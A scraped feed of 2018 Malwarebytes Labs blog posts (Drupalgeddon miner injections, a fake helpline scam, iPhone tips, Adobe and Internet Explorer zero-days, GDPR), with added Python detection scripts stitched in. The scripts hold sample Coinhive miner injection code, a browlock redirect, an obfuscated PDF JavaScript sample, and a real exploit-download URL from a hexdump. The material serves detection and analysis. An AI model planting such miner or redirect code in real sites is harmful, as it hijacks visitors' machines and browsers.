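    """Last path segment of a URL, without query string or fragment."""
    return url.split("?", 1)[0].split("#", 1)[0].rsplit("/", 1)[-1]


class ScriptCollector(HTMLParser):
    """Collects <script src=...> URLs and the bodies of inline <script> blocks."""

    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.srcs.append(src)
        else:
            self._in_script = True
            self.inline.append("")

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline[-1] += data


def scan_html(html, site_host):
    """Return (category, detail) findings for one page served by `site_host`."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.srcs:
        # Catches both the vendor CDN copy and self-hosted copies of the miner.
        if _basename(src) in MINER_SCRIPT_NAMES:
            findings.append(("miner-script", src))
    for body in parser.inline:
        for key in MINER_KEY_RE.findall(body):
            findings.append(("miner-key", key))
        for url in REDIRECT_RE.findall(body):
            if _host(url) and _host(url) != site_host.lower():
                findings.append(("offsite-redirect", url))
    return findings


# Constructed sample page (not a real capture): a Coinhive injection with a
# placeholder site key, plus the browlock redirect quoted in the post.
SAMPLE_HTML = """<html><head>
<script src="https://coinhive[.]com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous("SITEKEYPLACEHOLDER00000000000000");
miner.start();
</script>
</head><body>
<script type="text/javascript">
window.location.replace("http://hispaintinghad[.]tk/index/?1641501770611");
window.location.href = "http://hispaintinghad[.]tk/index/?1641501770611";
</script>
</body></html>"""

if __name__ == "__main__":
    for category, detail in scan_html(SAMPLE_HTML, "example.org"):
        print(f"{category}: {detail}")
```

Because the injected code is often dynamic, run the scan against the HTML the server actually returns rather than the theme files on disk.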

Figure 8: Collage of some of the most common miner injections

Snapshots

The following are some examples of compromised sites sorted by category. We have contacted all affected parties to let them know their resources are being used by criminals to generate profit from malicious cryptomining or malware infections.

Figure 9: Education (University of Southern California)

Figure 10: Government (Arkansas Courts & Community Initiative)

Figure 11: Political party (Green Party of California)

Figure 12: Ad server (Indian TV Revive Ad server)

Figure 13: Religion (New Holly Light)

Figure 14: Health (NetApp Benefits)

Figure 15: Conferences (Red Hat partner conference) 

Figure 16: Tech (ComputerWorld’s Brazilian portal)

Malicious cryptomining remains hot

It is clear that right now, cryptomining is the preferred kind of malicious injection. There are many public but also private APIs that make the whole process easy, and unfortunately they are being abused by bad actors.

Compromised sites big and small remain a hot commodity that attackers will try to amass over time. And because patching remains an issue, the number of potential new victims never stops growing. In light of this, website owners should look into other kinds of mitigation when patching is not always an immediate option, and check what some people call virtual patching. In particular, Web Application Firewalls (WAFs) have helped many stay protected even against new types of attacks, and even when their CMS was vulnerable.

Malwarebytes continues to detect and block malicious cryptomining and other unwanted redirections.

Indicators of compromise


The post A look into Drupalgeddon’s client-side attacks appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Exploring the virtual worlds of advergaming

Malwarebytes - Thu, 05/17/2018 - 16:00

Games and analytics services ran into one another headfirst recently, in a spat related to the game Conan Exiles.

Developers had to remove a tracking service, which allowed game developers to track where Steam players had come from. By generating an API key and integrating it into the game, developers could figure out which ad campaigns (for example) had directed gamers to Steam at first install.

From another game developer’s forum, where they too ended up removing the system:


[UPDATE: Redshell plugin has been removed as a part of a recent patch]

This is a commonly used service that lets us (based on anonymized user footprint) see if those who bought the game came to the Steam store from some link below a Youtube video, from Facebook campaigns etc. It helps us see which marketing campaigns worked and which didn’t – no game data are sent there at all.

Once again – both Treasure Data and Redshell are solutions used by many developers and games (you can google them, if you wish). In both cases, all the data are anonymous and are sent to servers that only we can access.

As far as Conan goes, the system in place ultimately led to bad reviews, and when the bad reviews start rolling in due to third-party apps, there can be only one end result:


From the Community Manager:

The system this review mentions is no longer in Conan Exiles as of this writing. Some gamers are so fed up with third party tracking / analytics in games that they now curate Steam lists purely for games making use of said setups.

What’s fascinating to me is that gamers often have no idea exactly how much data a developer racks up even without third-party tools or analytics in place. Even in the case of Conan Exiles, there’s currently a lack of official servers so people are being encouraged to use third-party servers run by random admins. You’re being asked to place a lot of trust in someone who can simply decide to stop paying for hosting, and who also has full control over the game settings. What happens to all your cool stuff when the admin pulls the plug or decides their friend has a better claim to the land you built your castle on?

The answer is, “It’s probably all just gone out the window, sorry.” Yet as best I can tell, there aren’t as many aggrieved voices raised in relation to rogue admins or even the “anti-tamper” technology in place.

I’ve covered Privacy Policies at length in the past, so I won’t dwell on them here.

What I do want to do is give you a link to a talk I gave at Virus Bulletin 2017, all about the Virtual Worlds of Advergaming.

If you’re even remotely concerned about a system sending “how did they get here?” data to a game developer, you should be aware that marketing, advertisements, and even social engineering designed to throw ads at you in-game have existed for a long time. In fact, it’s already starting to bleed over to augmented and virtual reality.

Did you ever wonder why you’d been funneled down a narrow corridor in a shooter, then forced to crouch behind a branded energy drinks dispenser as the only piece of available cover in a gunfight?


Or why devs would place a huge billboard at the top of a hill you had to spend a few minutes hiking toward?


Maybe you just wondered if an in-game ad network dedicated to virtual titles was potentially susceptible to dubious ads like the mock-up below?


These are all things I’ve endeavored to cover in this talk.

Here’s the pitch:

As adverts in gaming (advergaming) ecosystems continue to become more sophisticated—while the game networks themselves have effectively become social networks—so too do the potential complications for parents, children, and gamers, who just want to play without worrying about where their data is going (and how it is being used). Attempts at blocking ads on closed gaming networks, tablets, and PC games have started to turn into the same type of turf war as seen on PC desktops, and forays into VR gaming have only made this more of an issue—the more potentially realistic the game experience, the harder it becomes to disassociate product advertising from the world around you.

This presentation explains: the different types of in-game ads (static, dynamic, through the line, below the line), how adverts have effectively broken simple processes for good, which specific types of advertising are used on certain platforms, and the gamification of people in the real world. It will also illustrate some of the tricks and techniques used by advertisers to ensure that gamers can’t avoid adverts as part of their gaming experience, and will compare the oldest forms of advergaming with the newest techniques, looking at how gamers trying to block ads have led to unskippable ads which form part of gameplay, and at what the future holds for VR/augmented in-game advertising.

Viewers should come away with a greater understanding of the types of advertising used in the systems they engage with on a daily basis, how that advertising may target family members in specific ways, which types of gaming are least/most susceptible to advergaming, how game developers manipulate gamers into seeing ads at specific times, and the informed choices available to reduce or eliminate forms of in-game ads they may feel uncomfortable with.

I’d like to think I got the job done for the attendees of Virus Bulletin 2017, shining as big a light as I could on some of these practices in the 25 minutes available to me. You can read the full paper about the Virtual Worlds of Advergaming here.

Otherwise, you can simply watch the talk (with a few minutes of the opening missing due to a technical hitch) below.

The post Exploring the virtual worlds of advergaming appeared first on Malwarebytes Labs.


Fake Malwarebytes helpline scammer caught in the act

Malwarebytes - Thu, 05/17/2018 - 15:00

An estimated one in every 10 American adults lost money in a cyber scam in the past 12 months, according to a report released by the FTC earlier in the month. On average, each scam victim lost $430, totaling about $9.5 billion overall.

To put this in perspective, that’s over 22 million Americans scammed for $26 million a day, more than $1 million an hour, $18,000 per second.

No one is immune, and now more than ever there is a need to be vigilant. Being taken by a scam can ruin lives or damage the reputation of legitimate companies. No one is excluded—not Amazon, Dell, Malwarebytes, or you.

In the example below, we’ll show how scammers Blue Eye Ventures, LLC, tried to imitate Malwarebytes in order to trick people out of money. Now, more than ever, it’s important to be vigilant in order to tell the good guys from the bad.

Malwarebytes helpline scam

Using a modern web design aesthetic, Blue Eye Ventures makes a reasonably good impression of a company looking to help its clients. They advertise that they are a Malwarebytes helpline. But they are not.

In order to catch these guys in the act, I called the toll-free number asking for help, telling them I wasn’t sure my Malwarebytes software was working properly. I allowed the technician to have access to my computer. He opened up my Malwarebytes software.

I’m sorry sir, this is fake software

The technician on the phone advised me that the (legitimate) Malwarebytes software I was running was fake. Now, I knew that it was not fake. I ran it minutes earlier and it worked perfectly.

Next thing I knew, he ran a tree command. Tree is a recursive directory listing program that produces a depth-indented listing of files. This is not a diagnostic tool.

These are the results he produced:

At the bottom of the tree command, he typed “Security Breach” to scare me into believing that my computer was being hacked.

More scare tactics

He then checked my System Configuration:

The tech told me that all my software wasn’t running. “It’s stopped.” This was to scare me into believing that my system wasn’t working. Again, he wasn’t using any tools to diagnose hacking or infections.

He then pulled up Resource Monitor:

The tech asked me, “Do you know what crss.exe means?” I told him I don’t, even though I do.

The csrss.exe file located in C:\Windows\System32 is a real file, and removing it will cause problems with your PC. If someone tells you it’s a virus, that’s a hoax.

Case in point, to further scare me into believing my computer was infected, the tech asked me to read the description he pulled up on Google about the csrss.exe file being a Trojan horse or virus.

The Google result pulls information from an unreliable and untrustworthy source. For example, the article linked here recommends users remove this “malware” from their Mac systems. Any file with .exe is a Windows executable.

Meanwhile, the scammer still hadn’t checked my system with any real tools to find problems. He was only there to scare me into purchasing his plans.

Do not purchase

Below are the plans he offered me, from one year of support for $200 to a lifetime plan for $700. I was instructed to pay Blue Eye Ventures, LLC, by check. Or I could use my credit card at Easy-installatio.com (phone number +120-3354649). This is a Canadian number—and Malwarebytes’ HQ is in the United States.

How do you think a real customer would feel? They purchased Malwarebytes and now they are being told that they purchased phony software, their computer is infected, and it’s going cost them hundreds of dollars to repair. Scammers are not only ruining the reputation of legitimate companies, but they are ripping customers off in the process.

At Malwarebytes, we are always working to expose fraud and educate consumers. We will never sell phony software. We will never charge you hundreds of dollars to fix your computer. And we will teach you how to spot the companies who do.

The post Fake Malwarebytes helpline scammer caught in the act appeared first on Malwarebytes Labs.


Seven security tips for staying safe on an iPhone

Malwarebytes - Wed, 05/16/2018 - 15:00

iPhones have a reputation for being notoriously secure. After all, they caused quite the kerfuffle between Apple and the FBI because they are, from the FBI’s point of view, too secure! However, don’t let that lull you into a false sense of security. Using an iPhone is not an automatic guarantee of invulnerability.

The good news is that there are easy things to do to avoid causing problems for yourself. The following seven tips will help you to make sure your iPhone is the digital fortress that it was meant to be.

1. Use a long passphrase

Most people set a four-digit PIN code, or perhaps the slightly more secure six-digit PIN, to secure their phones. And sure, this seems like perfectly acceptable protection, given that the phone will lock itself down for increasing amounts of time if a thief tries to unlock it with the wrong code too many times. Depending on your settings, it may erase itself after 10 incorrect tries.

What can possibly go wrong? Out of a possible 10,000 combinations, the attacker has to guess correctly in the first 10 attempts. The chances of doing that are quite low—one in 1,000, to be precise. Using six digits improves your odds further.

However, not all attacks involve poking numbers into the screen repeatedly. There have been many devices over the years capable of retrying PIN numbers endlessly, with no penalties, by taking advantage of vulnerabilities in the hardware or software of the iPhone. The latest of these, the GrayKey device, can crack a four-digit PIN in an hour or two, and a six-digit PIN in three days or less.

If there’s one universal truth about these passcodes, it’s that longer is better. The best thing you can do is start using a longer alphanumeric password instead of a PIN code. Each additional character of length increases the time needed exponentially, and that time gets even longer when adding letters and symbols to the mix.

To change to a longer password, open the Settings app, then tap Touch ID & Passcode. Enter your current PIN, then tap Change Passcode on the next screen. Enter your passcode again, but then instead of entering a new passcode, tap Passcode Options. This will give you the option to choose, among other things, a custom alphanumeric code.

I know what you’re thinking. Who wants to enter a lengthy password every time they unlock their phone? Fortunately, modern iPhones have convenient biometric options for accessing the device without entering the password every time. Either Touch ID or Face ID gets you into your phone fast, without needing to enter the password.

Of course, Touch ID and Face ID are convenience features, not security features. There are valid concerns about the safety of using a biometric pattern that cannot be changed as a replacement for a password. Still, if they allow you to use a longer password conveniently, that’s worth way more than avoiding them but using a short PIN code. You can always temporarily lock the device so that Touch ID and Face ID won’t work. For more information, see Apple’s information on the security of Touch ID and Face ID.

2. Lock down your Apple ID with 2FA

With what, now? That funny abbreviation (2FA) stands for two-factor authentication, a means of authentication that requires not just something you know, like a password, but also something you have, like a temporary, one-time-only code. Without both, an attacker cannot access your account.

Your Apple ID provides the keys to the kingdom. It’s tied to every device you own. It probably has a credit card associated with it. Your Apple ID is also your iCloud account, and as such it may hold all manner of tempting goodies, including passwords.

Fortunately, Apple offers 2FA on your Apple ID, and it’s strongly recommended that you take advantage of this. Doing so means that you will always have to enter both your password and a six-digit code sent to a trusted device before logging on to your account from a new machine. This makes it very difficult for a hacker to access your Apple ID and the trove of data it can give access to.

3. Keep your iPhone up-to-date

Keeping your system and all your apps up-to-date is an important part of staying secure. iOS (the system that runs on iPhones) updates frequently to fix vulnerabilities that could be used in various scenarios to attack your device. Some of these are minor, others are major issues.

As an example, consider the GrayKey device discussed above. The method it uses to break into iPhones is still unknown, but one thing is for sure: It relies on one or more unknown security vulnerabilities in iOS. At some point, Apple will find and fix those vulnerabilities, making you safe from GrayKey or any other groups or individuals who may have discovered the vulnerabilities. If you don’t install iOS updates promptly when they are available, though, you remain vulnerable.

Worse, once a vulnerability is patched and Apple publishes their release notes, that gives hackers a little extra information that may help them find the vulnerability, meaning older systems are potentially in greater danger after that point.

4. Use a VPN on free Wi-Fi

Public Wi-Fi can be extremely hazardous. Anyone else on the same network can see any unencrypted network transmissions you make, and an untrustworthy network can actually perform all manner of man-in-the-middle attacks for phishing or other malicious purposes. For example, if you try to log onto your bank site on public Wi-Fi, you might not actually be logging onto your bank site. It could be a malicious look-alike site that bad actors within the Wi-Fi network are sending you to instead.

You could always use cellular data when in public, turning off Wi-Fi in settings, but that’s not always practical, especially with the data caps on most cell data plans. Fortunately, there’s a good solution: a VPN, or virtual private network. Using a good VPN means that all your network traffic is tunneled through an encrypted connection to a server located somewhere else.

Unfortunately, there are a lot of insecure or untrustworthy VPNs out there. It doesn’t help your security much if the VPN is careless with your data, or is otherwise not acting in your best interests. There are many free VPNs out there, but remember the first rule of free services on the Internet: If you’re not paying for it, you’re the product.

Finding a trustworthy, secure VPN can take a little work. Fortunately, an excellent article by Brian Krebs provides details about VPNs and how to select a good one. Make sure that the VPN you choose has good support for iOS; anything that requires you to download an app, but doesn’t offer an iOS app, is off the table from the start.

5. Use additional encryption

The encryption on the iPhone is one of its finest features, but it’s not perfect. As long as there’s any chance of cracking your iPhone’s passcode, or gaining access to unencrypted backups, your data isn’t safe. For your particularly sensitive data, such as passwords, social security numbers, credit card numbers and the like, you need additional encryption.

Using a password manager with its own strong encryption, and a strong password different from any other password you use, can be extremely helpful. A utility like 1Password can store a vault in iCloud that is encrypted independently, meaning an attacker looking for your passwords would need to first crack your phone or iCloud account to access the vault, then crack the vault itself.

Similarly, Apple’s own Notes app now allows creation of encrypted notes, which can be secured with a password of your choice. Use of a strong, unique password means that the data such a note contains is also quite secure.

When it comes to your iPhone backups, consider backing up to your computer using iTunes, and set iTunes to encrypt those backups. Such encryption will use a separate password that you set, so be sure to use a strong, unique password for that.

6. Audit privacy settings periodically

There are many permissions that can be granted to apps, such as access to the camera, the microphone, your contacts, and your location. It’s a good idea to keep track of which permissions you’ve given to which apps, and to revoke any permissions that are not strictly needed. For example, if you posted a photo to Twitter once, but you aren’t likely to do it again, it would be a good idea to remove the right to look at your photos from the Twitter app.

In Settings, tap on Privacy. Here resides the master list of all permissions and which apps you’ve granted them to. Go through all of them periodically, and revoke any permissions that you don’t think a particular app needs.

7. Beware of scams

Use of an iPhone doesn’t do a thing to protect you against scam phone calls or scam text messages. Always be wary of calls or messages from unknown senders. Treat any links received in text messages with extreme suspicion, even if it’s from someone you know, since the sender could be spoofed or their phone could have been stolen.

If you tap a link in a message and the site wants you to log in or provide other personal information, verify with the sender that it’s legitimate. If it appears to be a site you’re familiar with, consider visiting the site via a bookmark instead of the link.

You can also consider using security software that can screen and block scam calls and texts, such as Malwarebytes for iOS (coming soon).

The most secure phone

It’s okay to feel safe as an iPhone owner. Currently, iPhones are the safest smartphones on the planet. However, as demonstrated here, there are still plenty of ways that you can become a victim. So don’t just assume you’re safe automatically by virtue of owning an iPhone.

Doing the right things to keep yourself safe can often be more important than having the most secure phone.

The post Seven security tips for staying safe on an iPhone appeared first on Malwarebytes Labs.


Adobe Reader zero-day discovered alongside Windows vulnerability

Malwarebytes - Tue, 05/15/2018 - 18:44

During the first half of 2018, we have witnessed some particularly interesting zero-day exploits, including one for Flash (CVE-2018-4878) and more recently for Internet Explorer (CVE-2018-8174). The former was quickly used by exploit kits such as Magnitude, while it is only a matter of time before we see the latter being weaponized more widely.

We can now add to that list an Adobe Reader zero-day (CVE-2018-4990), which was reported by ESET and Microsoft and has already been patched. Although it has not been observed in the wild yet, it remains a dangerous threat considering it is coupled with a privilege escalation vulnerability in Microsoft Windows.

To exploit the Windows vulnerability, the attacker must write to an arbitrary address in kernel space, which will not work for Windows 8 and above, as newer security features prevent this kind of mapping. Those two combined zero-days were necessary to escape the Acrobat Reader sandbox protection, which to its credit has been improving the security of the software drastically, so much so that malicious PDFs that were once common as part of drive-by download attacks have all but vanished.

Let’s take a quick look at the malicious PDF using pdf-parser:

python pdf-parser.py --content CVE-2018-4990.pdf

We can see a suspicious obfuscated blurb that most likely contains the JavaScript code we are looking for. We can decode and dump the output to a raw file:

python pdf-parser.py -c CVE-2018-4990.pdf --object 1 --filter --raw > output.raw

The exploit code is now visible in clear text. For a good explanation on how it is used for the ROP chain and shellcode execution, please refer to the ESET article.
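As an added example, not the pdf-parser tool and not code from the post, this Python triage helper performs the two steps above in one pass over a constructed minimal PDF (not the CVE-2018-4990 sample): it walks the stream objects, inflates /FlateDecode streams and flags objects whose content looks like JavaScript, so the obfuscated blob is found without dumping every object by hand.

```python
"""Triage helper for the two pdf-parser steps above: walk a PDF's stream
objects, inflate /FlateDecode streams and flag the ones that look like
JavaScript (added example, not pdf-parser and not code from the post)."""
import re
import zlib

# "N G obj << ... >> stream\n": captures the object number and its dictionary.
# The dictionary may not run past "endobj", so one object cannot swallow the next.
STREAM_OBJ_RE = re.compile(
    rb"(\d+)\s+\d+\s+obj\s*(<<(?:(?!endobj).)*?>>)\s*stream\r?\n", re.DOTALL)
# Direct /Length values only; an indirect "/Length 12 0 R" is ignored.
LENGTH_RE = re.compile(rb"/Length\s+(\d+)\b(?!\s*\d+\s+R)")
# Heuristic markers of (often obfuscated) Acrobat JavaScript.
JS_HINTS = (b"eval(", b"unescape(", b"String.fromCharCode", b"app.", b"util.")


def iter_streams(pdf):
    """Yield (object_number, dictionary, raw_stream_bytes) for each stream object."""
    for m in STREAM_OBJ_RE.finditer(pdf):
        num, dictionary, start = int(m.group(1)), m.group(2), m.end()
        lm = LENGTH_RE.search(dictionary)
        if lm:
            data = pdf[start:start + int(lm.group(1))]
        else:  # no direct /Length: fall back to the endstream keyword
            end = pdf.find(b"endstream", start)
            if end < 0:
                continue
            data = pdf[start:end].rstrip(b"\r\n")  # drop the EOL before the keyword
        yield num, dictionary, data


def decode_stream(dictionary, data):
    """Apply /FlateDecode when the dictionary asks for it; other filters are left raw."""
    if b"/FlateDecode" in dictionary:
        try:
            return zlib.decompress(data)
        except zlib.error:
            return data  # corrupt or truncated stream: keep the raw bytes for review
    return data


def find_js_objects(pdf):
    """Return {object_number: decoded_stream} for streams that look like JavaScript."""
    hits = {}
    for num, dictionary, data in iter_streams(pdf):
        decoded = decode_stream(dictionary, data)
        declared = b"/JavaScript" in dictionary or b"/JS" in dictionary
        if declared or any(hint in decoded for hint in JS_HINTS):
            hits[num] = decoded
    return hits


def build_sample_pdf():
    """Constructed minimal PDF (not the CVE-2018-4990 sample): an /OpenAction
    that runs a Flate-compressed, lightly obfuscated script from object 4."""
    script = b"var s = unescape('%61%70%70'); eval(s + '.alert(1)');"
    compressed = zlib.compress(script)
    objects = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>",
        b"<< /Type /Pages /Kids [] /Count 0 >>",
        b"<< /S /JavaScript /JS 4 0 R >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n%s\nendstream"
        % (len(compressed), compressed),
    ]
    pdf = b"%PDF-1.7\n"
    for num, body in enumerate(objects, start=1):
        pdf += b"%d 0 obj\n%s\nendobj\n" % (num, body)
    return pdf + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


if __name__ == "__main__":
    for num, js in find_js_objects(build_sample_pdf()).items():
        print(f"object {num}: {js.decode('latin-1')}")
```

Object streams, cross-reference streams and filters other than FlateDecode are out of scope here; for those, fall back to pdf-parser as the post does.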

We tested this zero-day against Malwarebytes, which was already stopping it without the need for any additional updates. The mitigation happens at the very beginning of the exploitation chain (stack pivoting):

We recommend users patch their systems to prevent this threat, which will most likely be weaponized in the wild soon. A very plausible attack scenario would be a PDF attachment in a malspam campaign.

The Adobe security bulletin (CVE-2018-4990) can be found here, while Microsoft’s (CVE-2018-8120) is here.

The post Adobe Reader zero-day discovered alongside Windows vulnerability appeared first on Malwarebytes Labs.


GDPR causes a flood of new policies

Malwarebytes - Tue, 05/15/2018 - 18:25

The European Union claims that the General Data Protection Regulation (GDPR), which comes to term on May 25, is the most important change in data privacy regulation in 20 years. Many companies have spent months preparing for the changes, working on policy and compliance, and introducing changes to their products in order to meet new standards.

We have received quite a few alerts and emails about those policy changes from a wide variety of companies. Combing through the alerts allowed us to see some interesting methods to solve—or evade—the problems that come with making businesses compliant. Let’s take a look at how different companies are coping with GDPR changes, and what you’ll need to pay attention to in those emails.

Total evasion

For some companies whose business interests are too slim in Europe, giving up seemed like the best option. File this alert from Unroll.Me, an app to unsubscribe from unwanted mailing lists, under “why bother.”

because our service was not designed to comply with all GDPR requirements, Unroll.Me will not be available to EU residents…. And we must delete any EU user accounts by May 24.

Obviously, there is a reason for such drastic measures, and I would call it a good guess if someone were to suggest that this might be related to Unroll.Me having been found selling email data to Uber.

Unroll.me may not be the only company walking away from its European customers in the face of GDPR. Some services have popped up seeming to help companies stay compliant by blocking EU visitors to websites. The GDPR shield shown below was promoted for a period as a possible solution, but the site seems to be down now. Or I could not reach it because I’m in the EU, and the block works too well.


Keep EU visitors off your site by using a GDPR Shield

Chain responsibility for advertisers

Some sites and platforms have advertising partners with whom they share user data. GDPR states that So, you would hope that they take special care in selecting partners who will handle that shared data. Instagram and other Facebook companies have decided on a different approach, shifting that portion of the responsibilities to their advertisers:

Businesses who advertise with Instagram and the Facebook companies can continue to use our platforms and solutions in the same way they do today. Each company is responsible for ensuring their own compliance with the GDPR, just as they are responsible for compliance with the laws that apply to them today.

Helping B2B customers

Google Cloud, on the other hand, offers to help their customers.

You can count on the fact that Google is committed to GDPR compliance across Google Cloud services. We are also committed to helping our customers with their GDPR compliance journey…

What deserves your attention

Under the GDPR rules, companies need explicit and informed consent from their customers to collect and use their data, so you can expect, and probably have already seen, a lot of policy changes (Terms of Service). As much as you might be tempted to automatically delete the influx of emails from online providers, it’s important to pay attention to those new privacy policy regulations—especially if it appears that the company may be cutting corners in meeting GDPR standards.

When sifting through these emails, I’ve come across some that I would not count as informed consent. A banner that looks and behaves like a cookie warning does not qualify, and neither does providing a less-than-comprehensive picture by spreading out information across several different web pages. I’m hoping that these platforms will provide more detailed and specific information before the magic GDPR drop date arrives.

To juxtapose these flimsy attempts at GDPR compliance, Google has done an excellent job informing its users of changes. Its Privacy Policy has been updated to make the content easier to understand in light of the GDPR demand that users be able to make informed decisions. It has updated the language and navigation of the document, and introduced videos and illustrations in order to make things clear.

Some companies that are active worldwide do make a distinction between EU and non-EU customers, but offer the same functionality that is automatically applied to EU-based IP addresses as an option to users outside of the EU.

When a user is in Privacy Mode, we will not collect or process any personal data, as defined by GDPR. In cases where we do not have a lawful basis for processing personal data we will apply Privacy Mode to requests from IP addresses associated with an EU country.

Other, smaller, companies made an effort to send out more personalized notifications letting me know I needed to approve their new policy in order to stay in touch:

While the ongoing influx might be a nuisance in your inbox, this is a great opportunity to review the privacy policies and maybe say goodbye to some of the companies that have your email address. (Although the professional spammers will probably just keep on going as if nothing has changed.)

Where will GDPR lead us?

Looking at the examples we have seen so far, we can divide the big players from the small players and see that some small players from outside the EU are giving up that part of the market—at least for the time being. The big players and European companies are mostly applying the same policies for EU and non-EU customers, although there will always be some exceptions.

Some have predicted there will be two separate Internets as a result of GDPR. I don’t think that will happen. But we will soon get a better idea of how things will play out once the implementation is done and the first shots across the bow have been fired.

In the meantime, it is worth your time to review the changed policies carefully and pay close attention to privacy policies when you sign up for something new.

And in case you were wondering about ours, feel free to review the Malwarebytes Privacy Policy.

The post GDPR causes a flood of new policies appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (May 7 – May 13)

Malwarebytes - Mon, 05/14/2018 - 17:18

Last week on Labs, we looked at the case of a fake Android AV, an annoying adware that goes by the name of Kuik, the return of threat actors behind the Shopper Stop tech scam, a new Netflix phishing scam, the recent zero-day vulnerability in Internet Explorer, and the insufficiency of merely relying on the presence of the green padlock. Also, in a brief blog post, we talked about why we removed the blacklist of tech support scammers we have been dutifully maintaining for years.

Other news

Stay safe, everyone!

The post A week in security (May 7 – May 13) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Where did the tech support scam blacklist go?

Malwarebytes - Fri, 05/11/2018 - 15:00

For about five years, we’ve maintained a blacklist of recognized tech support scammers, along with websites and phone numbers they might use to contact victims. The blacklist was part of our Tech support scams: help and resource page, which tells readers how scams work, what tricks to look out for, how to get help after you’ve been scammed, and who to contact to report the scam.

The blacklist was started long before the scale of tech support scamming was understood, and very quickly became unwieldy, hard to search, and, in many cases, outdated. Given the ease with which scammers can stand up low-cost infrastructure and switch VoIP numbers on the fly, we decided that a static blacklist is not the best way to share information with other researchers and interested users.

What we’re doing instead

On the Malwarebytes forums, we now have a “Report a Scam” section. (You must be logged in to view it.) After logging in, post any scam number you encounter, along with the URL of the company, if you have it. Posting in the forums makes it much more likely that a researcher will see it and block the scam ASAP.

What if you haven’t been scammed, but still want to help? How do you find scammers to report?

Digging up fake tech support

Loading a typo squat for a large, popular website can be a good starting point to find a browser locker (which leads to a tech support scam). But varying user agents and locations can deliver actual malware instead of a locker, so use this method at your own risk.

It’s a bit safer to start with social media, where scammers spam links for their fake companies. Searching Twitter for “Malwarebytes Support” yields a few tweets like the following:

More competent scammers will make use of link shortening services so as to not expose their infrastructure to potential takedown requests. We chose an amateur example for simplicity. (Twitter declined to take down the account when we asked.)

Clicking through yields a convincing scam site:

Now that we’ve got a scam URL and phone number, we can stop there and make a report. Or we can take a look at the website metadata and see if the scammer decided to set up a few alternate sites.

Throwing the latest IP into PassiveTotal’s query tool yields a whopping 1,029 domains, including historical hits that are no longer active. Most look to be part of an SEO operation, which makes sense because tech support scammers generally hire third-party SEO services to get their sites in front of victims.

Moving to Hurricane Electric, which provides a free pDNS tool without any historical data, yields the following:

Right away we can see two probable candidates for additional scams. Sifting through pDNS can often improve your scam hunting results, as well as help attribute multiple scams to the same threat actor group. Be sure to actually load the sites to confirm scamming, as legitimate tech companies overseas can sometimes exhibit design cues and domain names similar to fake tech support.

Scam hunting is fun and fairly straightforward. But we can’t be everywhere, and tech support scammers excel at setting up infrastructure with bargain hosting companies quickly. So why not help us get better, and report a scam in our forums? Happy hunting—and stay safe.

The post Where did the tech support scam blacklist go? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Internet Explorer zero-day: browser is once again under attack

Malwarebytes - Thu, 05/10/2018 - 19:58

In late April, two security companies (Qihoo360 and Kaspersky) independently discovered a zero-day for Internet Explorer (CVE-2018-8174), which was used in targeted attacks for espionage purposes. It has been two years since a zero-day was last found (CVE-2016-0189 being the previous one) in the browser that won’t die, despite efforts from Microsoft to move on to the more modern Edge.

The vulnerability exists in the VBScript engine and the way it handles objects in memory. It also affects IE11 on Windows 10, where VBScript is no longer supported, because the engine can still be loaded by using the compatibility tag for IE10.

The attack came via a Word document making use of OLE autolink objects to retrieve the exploit and shellcode from a remote server. However, it is important to note that it could very well have been executed by visiting a website instead.

Perhaps one reason it was not used as a drive-by download attack is that Internet Explorer is no longer the default browser for most people, so the exploitation would never occur. By tricking victims into opening an Office document, however, the attackers can force Internet Explorer to load, thanks in part to the URL moniker “feature.”

Using rtfdump.py, we see the call for an HTTP connection:

python rtfdump.py -s 320 -H CVE-2018-8174.rtf

000014C0: 70 B2 86 8C 53 30 05 43 00 38 30 01 18 68 00 74 p���S0.C.80..h.t
000014D0: 00 74 00 70 00 3A 00 2F 00 2F 00 61 00 75 00 74 .t.p.:././.a.u.t
000014E0: 00 6F 00 73 00 6F 00 75 00 6E 00 64 00 63 00 68 .o.s.o.u.n.d.c.h
000014F0: 00 65 00 63 00 6B 00 65 00 72 00 73 00 2E 00 63 .e.c.k.e.r.s...c
00001500: 00 6F 00 6D 00 2F 00 73 00 32 00 2F 00 73 00 65 .o.m./.s.2./.s.e
00001510: 00 61 00 72 00 63 00 68 00 2E 00 70 00 68 00 70 .a.r.c.h...p.h.p
00001520: 00 3F 00 77 00 68 00 6F 00 3D 00 37 00 00 00 00 .?.w.h.o.=.7....

This remote request will download a VBS script. A Proof of Concept adapted from the blog that was published by Kaspersky can be seen below:

The underlying flaw is a reference count that is checked at the beginning of a function but not again afterwards, even though it may be incremented along the way. This allows an attacker to execute malicious shellcode and eventually load the malware binary of their choice.

We tested this Use After Free (UAF) vulnerability with the publicly available PoC running Internet Explorer 11 under Windows 10. The browser crashes once it loads the VBS code, but with Malwarebytes, the attack vector is mitigated:

Microsoft has released a patch for this vulnerability, and we strongly advise applying it, as it is only a matter of time before other threat actors start leveraging this new opportunity in spam or exploit kit campaigns.

We will update this blog if we obtain more information about this vulnerability being used widely, and in particular, if a full working exploit is available.
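To show what the rtfdump output above is actually surfacing, here is an added example (not rtfdump, and not code from the post or from Kaspersky) that triages an RTF the way a first-pass detection script would: it decodes every \*\objdata hex payload, searches the resulting bytes for UTF-16LE http(s) URLs, and flags the document when an \objautlink object carries a remote URL. The sample document is constructed for the demonstration and contains no working OLE object; the only real value in it is the URL visible in the hexdump above.

```python
import re

def _utf16_hex(text):
    """Hex of a UTF-16LE string, the encoding URL monikers use inside OLE object data."""
    return text.encode("utf-16-le").hex()

# Constructed sample (not a working exploit document): an RTF whose OLE autolink object
# carries, in its \objdata hex, the URL that the rtfdump output above revealed.
SAMPLE_RTF = (
    r"{\rtf1\ansi\deff0 Quarterly report"
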